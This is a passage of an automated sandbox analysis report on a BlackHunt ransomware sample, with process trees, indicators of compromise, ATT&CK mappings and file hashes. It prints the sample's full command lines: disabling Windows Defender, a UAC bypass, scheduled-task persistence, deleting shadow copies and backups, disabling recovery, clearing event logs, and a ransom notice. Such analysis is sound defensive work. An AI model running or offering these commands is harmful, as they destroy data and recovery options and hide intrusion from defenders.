3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 53 PID 1740 wrote to memory of 2736 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 53 PID 1740 wrote to memory of 2736 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 53 PID 1740 wrote to memory of 940 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 54 PID 1740 wrote to memory of 940 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 54 PID 1740 wrote to memory of 940 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 54 PID 1740 wrote to memory of 940 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 54 PID 1740 wrote to memory of 2704 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 151 PID 1740 wrote to memory of 2704 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 151 PID 1740 wrote to memory of 2704 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 151 PID 1740 wrote to memory of 2704 1740 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe 151 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe"C:\Users\Admin\AppData\Local\Temp\3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1740 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2100
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2600
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2668
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2680
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵PID:1972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2656
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2080
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2620
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2736
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:940
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2704
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2024
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2456
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2536
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2504
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2972
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3016
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1060
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1864
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1640
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2448
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1660
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1084
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1872
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2180
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2352
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2116
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe" /F2⤵PID:1188
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe" /F3⤵
- Creates scheduled task(s)
PID:2128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2760
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2752
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2280
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2296
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2088
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2132
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2336
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:384
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:488
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
- Suspicious use of WriteProcessMemory
PID:2100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1648
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:4548
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:4532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3956
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:2164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:1628
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:2364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:3116
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:4748
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:4344
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4716
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:4780
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:4312
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4624
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4680
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:4944
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:4600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3048
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:4964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:4936
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:2580
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:4628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3620
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:2612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:324
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4760
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4696
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:4712
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1320
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\3ef6ee07b80bb4e6b790c3f21d543017f14aa96f41d89b530befe6aceab3393e.exe"2⤵
- Deletes itself
PID:3612 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:3412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:4572
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:4644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3288
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3776
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2624
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2848
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1608
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1268
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
684B
MD50f23a9a443068d9cf1220ebcb9d9a270
SHA1e309ffb91b850f6e41d4f4d768eabca656304b5c
SHA25669a219e52a4a41827e3d23008008f7466c64be6c154594da0c33661459012cd8
SHA51241bc844e23803d0df88155a959891e71e267f963e98200be1d815ca7787f88b9750c58e292b5525e63a41e8a0b7d8afc9d9714eda938e54b4fd5fe2dfb1afb3a
-
Filesize
12KB
MD5393c84b1700f305fdc429f72cb33ded7
SHA12f68de0669d005985917713770612df2bce5a385
SHA2560a8e68b4ef8e42a416cc8b01b91e3e98618f950965a45d1c9854b4e3bd14c325
SHA5129b5b10c8546cb3c9a98ff34545694e9d56876e846d9034b6d3ce51b7d29b0b0580353abfe2cef2efa0eee30db921d6047e46476840c208b02f2f0134fa3805dd
-
Filesize
1KB
MD5b77e9af154a52a549d4c5c490c032488
SHA108652a6d5c1967e8dacfb69622523097f8004bb2
